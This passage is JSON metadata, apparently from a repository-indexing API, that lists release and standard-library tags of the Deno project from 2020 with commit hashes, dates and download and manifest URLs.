pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.m